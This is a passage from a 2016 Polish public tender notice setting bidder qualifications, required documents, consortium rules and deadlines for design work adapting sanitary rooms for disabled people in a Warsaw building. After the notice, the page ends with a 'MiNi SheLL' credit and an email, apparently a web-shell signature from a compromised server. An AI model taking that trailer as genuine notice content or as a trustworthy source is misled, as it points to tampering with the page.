  na podstawie art. 24 ust. 1 i ust. 2 pkt. 5. ustawy z dnia 29 stycznia 2004 r. 
            Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2015 r., poz. 2164), a 
            także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 w/w 
            ustawy dotyczące:
a) 	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
b)	posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d) 	 sytuacji ekonomicznej i finansowej.
     Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o 
     spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 3 do 
     wzoru formularza oferty (pkt. 9.2.1. siwz) oraz w oparciu o potwierdzenie 
     spełniania warunków w zakresie wskazanym poniżej:
1. Wykonawca musi wykazać, że dysponuje osobami, które będą wykonywać 
                          dokumentację projektowo-kosztorysową, posiadającymi kwalifikacje 
                          zawodowe, doświadczenie i stosowne uprawnienia budowlane do 
                          projektowania bez ograniczeń w specjalności architektoniczno-budowlanej,  właściwej do wykonania przedmiotu zamówienia lub odpowiadające ww. w przypadku uprawnień wydanych przed dniem 30.12.1994 r. oraz  aktualne zaświadczenia o wpisaniu na listę członków właściwej Izby Samorządu Zawodowego. Spełnianie ww. warunku oceniane będzie na podstawie przedłożonego w ofercie wykazu osób (wg wzoru stanowiącego załącznik nr 5 do formularza oferty ). W w/w wykazie należy podać informacje na temat  
                          kwalifikacji zawodowych tych osób, ich uprawnień, doświadczenia i 
                          wykształcenia niezbędnego do wykonania zamówienia,  a także zakresu 
                          wykonywanych przez nich czynności i podstawie do dysponowania nimi. 
                          Wykonawca wybrany do podpisania umowy musi przedłożyć do umowy 
                          uprawnienia osób, które będą wykonywały zamówienie i ich aktualne
                          zaświadczenia o wpisaniu na listę członków właściwej Izby Samorządu 
                          Zawodowego. 
        2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, 
  osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi  stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić   Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji   zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie   podmiotów, oddających do dyspozycji Wykonawcy niezbędne zasoby na potrzeby wykonaniu zamówienia, w formie oryginałów. 
              Zamawiający wymaga aby składany dokument/dokumenty dotyczyły w 
              szczególności:
              - zakresu dostępnych Wykonawcy zasobów innego podmiotu - informację       
 wskazującą, który konkretny zasób jest udostępniany. W przypadku  udostępniania osób zdolnych do wykonania zamówienia należy imiennie wskazać osoby, które będą uczestniczyć w wykonaniu zamówienia. W przypadku  udostępnienia wiedzy i doświadczenia należy wskazać konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo itp.). W przypadku udostępnienia potencjału technicznego należy wskazać przekazanie do dyspozycji Wykonawcy narzędzia, wyposażenie zakładu, urządzeń technicznych lub na zasadzie podwykonawstwa. W przypadku udostępnienia  zdolności finansowych/  przeniesienie własności pieniędzy lub pozostawienie do dyspozycji  Wykonawcy środków pieniężnych albo ponoszenie solidarnej   odpowiedzialności za finansowanie nakładów + wykazanie, iż podmiot trzeci posiada środki finansowe lub zdolność kredytową w niezbędnym rozmiarze.
   - sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy   
      wykonywaniu zamówienia,
- charakteru stosunku , jaki będzie łączył wykonawcę z innym podmiotem, 
- zakresu i okresu udziału innego podmiotu  przy wykonywaniu zamówienia,
-zobowiązanie innego podmiotu do ponoszenia solidarnej odpowiedzialności wraz z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia zasobów, do udostępnienia których się zobowiązał, chyba, że za nieudostępnienie zasobów nie ponosi winy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania 
  na podstawie art. 24 ust. 1 i ust. 2 pkt. 5. ustawy z dnia 29 stycznia 2004 r. 
            Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2015 r., poz. 2164), a 
            także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 w/w 
            ustawy dotyczące:
a) 	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
b)	posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d) 	 sytuacji ekonomicznej i finansowej.
     Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o 
     spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 3 do 
     wzoru formularza oferty (pkt. 9.2.1. siwz) oraz w oparciu o potwierdzenie 
     spełniania warunków w zakresie wskazanym poniżej:
                         Wykonawca musi wykazać, że posiada opłaconą polisę, a w przypadku jej          
                         braku inny dokument  potwierdzający, że Wykonawca jest ubezpieczony od 
                         odpowiedzialności  cywilnej w zakresie prowadzonej działalności 
                         związanej z przedmiotem zamówienia potwierdzającą posiadanie w/w 
                         ubezpieczenia OC przez Wykonawcę na kwotę co najmniej 30.000 PLN.
                         Zamawiający oceni jako spełniony warunek sytuacji ekonomicznej i 
                         finansowej na podstawie opłaconej polisy, a w przypadku jej braku innego 
                         dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od 
                         odpowiedzialności  cywilnej w zakresie prowadzonej działalności 
                         związanej z przedmiotem zamówienia potwierdzającej posiadanie w/w 
                         ubezpieczenia OC przez Wykonawcę na kwotę co najmniej 30.000 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawca musi dołączyć do oferty w terminie wskazanym w pkt. 17. 
             specyfikacji istotnych warunków zamówienia i w formie określonej w  
             specyfikacji:
1.1. 	wypełniony i podpisany formularz oferty zgodny w treści ze wzorem stanowiącym Rozdział II specyfikacji istotnych warunków zamówienia, 
1.2. oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza pełnomocnictwa, o którym mowa w pkt. 9.6.1.2. niniejszej specyfikacji, jeżeli oferty będą składali Wykonawcy wspólnie ubiegający się o udzielenie zamówienia,  
1.3. oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza pełnomocnictwa, o którym mowa w pkt. 14.6.3. niniejszej specyfikacji, jeśli oferta będzie podpisana przez pełnomocnika,
1.4. 	informację o części / częściach zamówienia, które Wykonawca zamierza powierzyć podwykonawcom, o ile Wykonawca będzie realizował zamówienie z udziałem podwykonawców,  
1.5.  informację podmiotów i o podmiotach, które będą brały udział w realizacji  części zamówienia, na zasobach, których polega wykonawca na zasadach określonych w pkt. 8.2. siwz, 
             1.6. 	oświadczenie o zapoznaniu się i akceptacji założeń projektowych i 
    kosztorysowych na opracowanie dokumentacji projektowej i kosztorysowej architektonicznej przebudowy pomieszczeń sanitarnych pod kątem przystosowania dla osób niepełnosprawnych w budynku przy ul. Wiśniowej 35 w Warszawie
1.7.  zobowiązanie do wniesienia zabezpieczenia należytego wykonania umowy na załączniku nr 2 do oferty wg wzoru załączonego do wzoru formularza oferty, 
  1.8.	oświadczenie na załączniku nr 6 do oferty wg wzoru załączonego do wzoru formularza oferty, iż po upływie terminu ważności będzie odnawiać ubezpieczenie na kwotę nie niższą niż równowartość 30.000 złotych polskich na czas obejmujący wykonanie przedmiotu zamówienia oraz, że przedłoży Zamawiającemu do wglądu oryginał odnowionego ubezpieczenia w terminie 7 dni kalendarzowych od daty jego zawarcia, jednakże nie później niż w dniu podpisania umowy w przypadku gdy 
                dotychczasowe ubezpieczenie wygasa po terminie składania ofert, 
             1.9.   informacji określonej w pkt. 18.1.1. niniejszej specyfikacji w przypadku    
                           zastosowania  przez wykonawcę innej niż (23 %) stawki podatku od   
                           towarów i usług, obowiązującej w dacie składania ofert.
    2. W celu wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu, o których mowa w pkt. 8 SIWZ, Wykonawca zobowiązany jest złożyć wraz z ofertą następujące dokumenty: 
             2.1. oświadczenie na załączniku nr 3 do oferty wg wzoru załączonego do 
                         wzoru formularza oferty, że spełnia warunki określone w art. 22 ust.1
                         ustawy Prawo zamówień publicznych, 
2.2. 	wykaz głównych usług, wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich 3-ch lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat  wykonania i podmiotów na rzecz których usługi zostały wykonane, potwierdzający spełnienie warunku określonego w pkt. 8.1.1. niniejszej specyfikacji na załączniku nr 4 do oferty wg wzoru załączonego do wzoru formularza oferty, 
2.3. 	wykaz osób które będą uczestniczyć w wykonaniu zamówienia, potwierdzający spełnienie warunku określonego w pkt. 8.1.2. specyfikacji na załączniku nr 5 do oferty wg wzoru załączonego do wzoru formularza oferty,
2.4. opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 30.000 PLN.
2.5. dowody dotyczące usług, określające czy usługi te, (wykazane przez Wykonawcę w załączniku nr 4 do oferty, zgodnie z zapisem pkt. 8.1.1. i 9.2.2. specyfikacji istotnych warunków zamówienia) zostały wykonane lub są wykonywane należycie. Dowodami, o których mowa w zdaniu poprzednim są: 
              a)poświadczenie, z tym, że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert,
 b)oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o których mowa w pkt. a),
 W przypadku gdy Wykonawca wskazuje w wykazie usług usługi, które wcześniej zostały wykonane na rzecz Zamawiającego, nie ma obowiązku przedkładania w/w dowodów.
2.6. W przypadku gdy Wykonawca polegać będzie na doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu (w oryginale): 
            2.6.1.  pisemne zobowiązanie tych podmiotów do zrealizowania części zamówienia zawierające zakres robót, które te podmioty zobowiązują się wykonać i konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.)- w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na wiedzy i doświadczeniu innych podmiotów zakresie realizacji części zamówienia.
            2.6.2.   pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy osób, które będą uczestniczyć w realizacji zamówienia, zawierające także imienną listę tych osób - w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na osobach zdolnych do wykonani zamówienia innych podmiotów.
           2.6.3.   inne dokumenty i oświadczenia, zgodnie z wymogiem pkt. 8.2.
                             SIWZ.           
   3. 	W celu wykazania braku podstaw do wykluczenia z postępowania  o 
             udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w  
             art. 24 ust. 1 ustawy, Wykonawca zobowiązany jest złożyć wraz z ofertą:
3.1. 	oświadczenie na załączniku nr 7 do oferty wg wzoru załączonego do wzoru formularza oferty o braku podstaw wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Prawo Zamówień Publicznych,  
3.2. 	aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, 
3.3.  Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w pkt. 8 SIWZ, polega na zasobach innych podmiotów na zasadach określonych w pkt. 8.2. SIWZ, a podmioty te będą brały udział w realizacji części zamówienia, Wykonawca zobowiązany jest załączyć dokumenty wymienione w pkt. 9.2.6. i 9.3 i/lub 9.7. SIWZ, odnoszące się do tych podmiotów.
   4.  W celu wykazania braku podstaw do wykluczenia z postępowania  o   
             udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w  
             art. 24 ust. 2 pkt. 5  ustawy, Wykonawca zobowiązany jest złożyć wraz z 
             ofertą listę podmiotów należących do tej samej grupy kapitałowej, o której mowa 
             w art. 24 ust. 2 pkt. 5 ustawy lub informację o braku przynależności do grupy 
             kapitałowej - wzór druku stanowi załącznik nr 8 do oferty wg wzoru 
             załączonego do wzoru formularza oferty.
   5.   W celu potwierdzenia że oferowane usługi odpowiadają wymaganiom   
              określonym przez Zamawiającego  w SIWZ; 
              Zamawiający nie wymaga złożenia dokumentów na potwierdzenie, że oferowane 
              usługi  odpowiadają wymaganiom określonym przez Zamawiającego. Za 
              spełnienie tego warunku uzna złożenie oświadczenia, o którym mowa w pkt 
              9.2.1. SIWZ i wypełnienie formularza oferty.

   6. Oferta wspólna
    6.1. Zamawiający dopuszcza możliwość składania oferty przez dwóch lub więcej   
                 Wykonawców (w ramach oferty wspólnej w rozumieniu art. 23 Ustawy) 
                 pod warunkiem, że żaden z Wykonawców wspólnie ubiegających się o 
                 udzielenie zamówienia nie podlega wykluczeniu na podstawie art. 24 ust. 1 
                 i 24 ust. 2 pkt. 5 ustawy Pzp, a taka oferta spełniać będzie następujące 
                 wymagania: 
                6.1.1. Wykonawcy występujący wspólnie są zobowiązani do 
                            ustanowienia Pełnomocnika do reprezentowania ich w 
                            postępowaniu albo do reprezentowania ich w postępowaniu i 
                            zawarcia umowy w sprawie przedmiotowego zamówienia 
                            publicznego;
6.1.2. 	Oryginał pełnomocnictwa lub kopia poświadczona za zgodność z oryginałem przez notariusza lub inny dokument (np. Umowa konsorcjum, spółki cywilnej) powinien być załączony do oferty i zawierać w szczególności wskazanie: 
a)  postępowania o zamówienie publiczne, którego dotyczy;
b)	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby;
c)  ustanowionego Pełnomocnika oraz zakres jego umocowania;
6.1.3.	Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców. 
6.1.4. Każdy z Wykonawców (każdy członek konsorcjum)  składających ofertę  wspólną musi wykazać brak podstaw do wykluczenia z powodu niespełnienia warunków określonych w art. 24 ust. 1 i 24 ust. 2 pkt. 5 ustawy. W tym celu konsorcjum składa oświadczenie, o którym mowa w pkt. 9.3.1. i 9.4. siwz podpisane przez wszystkich Wykonawców oraz dokumenty określone w pkt. 9.2.4. i/lub 9.7.1., 9.7.2. siwz  dla wszystkich Wykonawców podpisane za zgodność z oryginałem przez Wykonawców.
6.1.5. W odniesieniu do warunków określonych w art. 22 ust. 1 ustawy 
wymagania te muszą być spełnione wspólnie przez Wykonawców składających ofertę wspólną (na ich potwierdzenie należy złożyć dokumenty określone w pkt. 9.2. siwz)  z zastrzeżeniem, że oświadczenie, o którym mowa w pkt. 9.2.1. siwz podpisane przez Pełnomocnika lub wszystkich Wykonawców musi być złożone w imieniu wszystkich  Wykonawców;
     6.2. 	Wszelka korespondencja prowadzona będzie przez Zamawiającego  
                  wyłącznie z Pełnomocnikiem, którego adres należy wpisać w formularzu 
                  oferty.
     6.3. Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, 
                 Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia 
                 publicznego, umowy regulującej współpracę tych Wykonawców.
             6.4. W przypadku złożenia oferty wspólnej Wykonawcy solidarnie odpowiadać 
                         będą za wykonanie zamówienia.

     7. Dotyczy Wykonawców mających siedzibę lub miejsce zamieszkania poza 
              terytorium Rzeczypospolitej Polskiej.
             7.1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium 
                         Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt.  
                         9.3.2. specyfikacji - składa dokument lub dokumenty wystawione 
   w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające  
                          odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
                   Dokumenty, o których mowa w pkt. 9.7.1. SIWZ powinny być wystawione 
                   nie   wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
             7.2. 	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca   
                           ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o 
                           których mowa w pkt. 9.7.1. SIWZ, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy,  złożone przed notariuszem, właściwym 
                           organem sądowym, administracyjnym albo organem samorządu 
                           zawodowego lub gospodarczego odpowiednio miejsca zamieszkania 
                           osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce 
                           zamieszkania. Zapisy pkt. 9.7.1 SIWZ odnoszące się do wymaganych 
                           terminów ważności poszczególnych dokumentów stosuje się 
                           odpowiednio. jw.
            7.3.  W przypadku Wykonawców mających siedzibę lub miejsce zamieszkania  
                         poza terytorium Rzeczypospolitej Polskiej wszystkie wykazywane przez 
                         nich w załącznikach do oferty częściowej i dokumentach wartości i kwoty  
                        w EURO będą przeliczane przez Zamawiającego w/g średniego kursu NBP na dzień upublicznienia postępowania.
 8. W PRZYPADKU, GDY WYKONAWCA W MIEJSCE KTÓREGOŚ Z 
            DOKUMENTÓW, O KTÓRYCH MOWA W PKT 9.2.4., 9.2.5., 9.3.2.., 9.7.1.., 
            9.7.2., NINIEJSZEJ SPECYFIKACJI DOSTARCZY JEGO KOPIĘ, KOPIA TA 
            MUSI BYĆ POŚWIADCZONA ZA ZGODNOŚĆ Z ORYGINAŁEM zgodnie z 
            zapisem pkt. 14.6.4 specyfikacji  istotnych warunków zamówienia przy czym w 
            przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, 
            zgodnie z zapisem pkt. 14.6.5. siwz  Zamawiający może zażądać przedstawienia 
            oryginałów lub notarialnie potwierdzonych kopii dokumentów np., gdy złożone  kopie dokumentów będą nieczytelne lub będą budzić wątpliwości co do ich prawdziwości.
9. Postępowanie o udzielenie zamówienia prowadzi się w języku polskim. 
              Dokumenty i oświadczenia sporządzone w języku obcym, są składane wraz z 
              tłumaczeniem  na język polski.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 99</li>
<li>2 - wydłużenie terminu płatności faktury VAT - 1</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie możliwość wprowadzenia zmian postanowień 
                umowy o ile  warunkiem wprowadzenia takich zmian będą między innymi 
                okoliczności, których nie można było przewidzieć w chwili zawarcia umowy 
                lub zmiany te będą korzystne dla Zamawiającego. Zamawiający dopuszcza 
                możliwość zmiany umowy w szczególności w następujących przypadkach:
    a) zmiany regulacji prawnych wprowadzonych w życie po dacie zawarcia    
    umowy wraz ze skutkami takiej zmiany regulacji prawnych;
    b) ograniczenia środków budżetowych na realizację Przedmiotu niniejszej 
    umowy;
    c) zmiany zakresu rzeczowego i finansowego;
                d)  zmiany osób uczestniczących w realizacji Przedmiotu niniejszej umowy;
          e) powierzenia Podwykonawcy wykonania części lub całości przedmiotu 
           zamówienia lub zmiany Podwykonawców w sytuacji, gdy z przyczyn, których 
           nie można było przewidzieć w chwili zawarcia umowy z Podwykonawcą, 
           koniecznym będzie dla prawidłowego wykonania umowy posłużenie się 
           przez Wykonawcę nowym Podwykonawcą, który będzie realizował część lub 
           cały zakres powierzony uprzednio innym Podwykonawcom. Jeżeli zmiana 
           albo rezygnacja z Podwykonawcy dotyczy podmiotu, na którego zasoby
           Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b
           Ustawy pzp, w celu wykazania spełniania warunków udziału w 
           postępowaniu, o których mowa w art. 22 ust. 1 ustawy pzp, Wykonawca jest 
           obowiązany wykazać Zamawiającemu, iż proponowany inny Podwykonawca 
           lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż 
           wymagany w trakcie postępowania o udzielenie zamówienia będącego 
           przedmiotem zamówienia;
                 f)zmiany terminu realizacji przedmiotu umowy w następstwie 
                 wydłużających/wykraczających poza ustawowe terminy procedur 
                 administracyjnych oraz innych terminów spraw urzędowych, mających 
                 wpływ na termin realizacji przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgnmokotow.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego przy ul. Irysowej 19 w Warszawie, pok. nr 34..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2016 godzina 10:00, miejsce: W siedzibie Zamawiającego przy ul. Irysowej 19 w Warszawie, pok. nr 21..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com